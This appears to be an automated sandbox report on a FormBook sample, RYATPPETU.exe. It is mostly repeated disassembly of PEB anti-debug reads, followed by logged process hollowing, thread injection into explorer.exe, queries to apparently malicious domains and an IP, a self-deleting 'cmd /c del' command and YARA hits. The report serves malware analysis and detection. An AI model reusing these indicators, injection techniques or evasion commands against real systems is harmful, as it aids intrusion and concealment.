Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05048DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0506740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0506740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0506740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05064015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05064015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05017016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05017016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05017016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05061074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05052073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05013884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05013884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05068CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050514FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0506070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0506070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0505131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05068B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05068F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0504D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0505138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05017794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05017794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05017794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05065BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050153CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050153CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F95210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0504FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05024257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0504B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0504B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05068A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05060EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05060EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05060EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050146A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0504FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05068ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F94F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F94F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCA70E mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\SysWOW64\cmmon32.exe

Process queried: DebugPort

Source: C:\Users\user\Desktop\RYATPPETU.exe

Code function: 0_2_022BC135 LdrInitializeThunk,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.etr6safvu8.com
Source: C:\Windows\explorer.exe	Domain query: www.lrbounee.xyz
Source: C:\Windows\explorer.exe	Network Connect: 172.67.161.80 80

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe

Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: E90000

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RYATPPETU.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RYATPPETU.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RYATPPETU.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe	Thread register set: target process: 3472
Source: C:\Users\user\Desktop\RYATPPETU.exe	Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\cmmon32.exe	Thread register set: target process: 3472

Source: C:\Users\user\Desktop\RYATPPETU.exe	Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RYATPPETU.exe'

Source: explorer.exe, 0000000C.00000000.603358664.0000000005EA0000.00000004.00000001.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 0000000C.00000000.572074802.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information:

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: RYATPPETU.exe PID: 2248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmmon32.exe PID: 5516, type: MEMORYSTR

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
